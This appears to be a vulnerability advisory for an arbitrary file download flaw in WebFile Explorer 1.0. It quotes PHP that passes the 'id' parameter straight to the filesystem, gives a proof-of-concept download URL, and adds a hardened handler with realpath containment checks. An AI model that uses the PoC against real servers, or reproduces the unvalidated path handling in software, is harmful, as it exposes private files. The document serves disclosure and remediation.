WebFile Explorer 1.0 - Arbitrary...

Published: 2025-04-13
Revised: 2025-04-13

* Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download
* Dork: N/A
* Date: 09.08.2017
* Vendor Homepage: http://speicher.host/
* Software Link: https://codecanyon.net/item/webfile-explorer/20366192/
* Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/
* Version: 1.0
* Category: Webapps
* Tested on: WiN7_x64/KaLiLinuX_x64
* CVE: N/A
* Exploit Author: Ihsan Sencan
* Author Web: http://ihsan.net
* Author Social: @ihsansencan

### Description:

The vulnerability allows an attacker to download arbitrary files.

Vulnerable Source:

```
// ............. (elided in the original advisory)
// The "id" request parameter is used directly as a filesystem path, with no validation.
$file = $_GET['id'];

if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
// ............. (elided in the original advisory)
```

### Proof of Concept:

```
http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE]
```
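
A hardened form of the download handler, added here as an example; it is not code from the advisory or from the vendor. It assumes downloadable files live in a `WebExplorer` directory beside `download.php` and that `id` is resolved relative to the script (both inferred from the PoC URL); `STORAGE_ROOT` and `resolve_download()` are hypothetical names.

```php
<?php
// Added example (not from the advisory). Assumption: files are served from
// ./WebExplorer beside this script, and "id" is resolved relative to the script.
const STORAGE_ROOT = __DIR__ . DIRECTORY_SEPARATOR . 'WebExplorer';

/** Return the canonical path of $path if it is a regular file inside $root, else null. */
function resolve_download(string $root, string $path): ?string
{
    if (strpos($path, "\0") !== false) {
        return null;                      // NUL bytes are never valid in a path
    }
    // realpath() collapses "../" and follows symlinks; it returns false if the target is missing.
    $rootReal = realpath($root);
    $fileReal = realpath($path);
    if ($rootReal === false || $fileReal === false || !is_file($fileReal)) {
        return null;
    }
    // Compare against root + separator so a sibling such as "WebExplorer-old" does not match.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($fileReal, $prefix, strlen($prefix)) === 0 ? $fileReal : null;
}

if (PHP_SAPI !== 'cli') {                 // act as the request handler only under a web server
    $id   = $_GET['id'] ?? '';
    $file = is_string($id) && $id !== ''
        ? resolve_download(STORAGE_ROOT, __DIR__ . DIRECTORY_SEPARATOR . $id)
        : null;
    if ($file === null) {
        http_response_code(404);          // same answer for "missing" and "outside the root"
        exit;
    }
    // Keep quotes and backslashes out of the quoted filename parameter.
    $name = str_replace(['"', '\\'], '_', basename($file));
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . filesize($file));
    header('X-Content-Type-Options: nosniff');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    readfile($file);
    exit;
}
```

The containment check runs on the canonical path after `realpath()`, so traversal sequences and symlinks that point outside the storage root are both refused before any header is sent.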
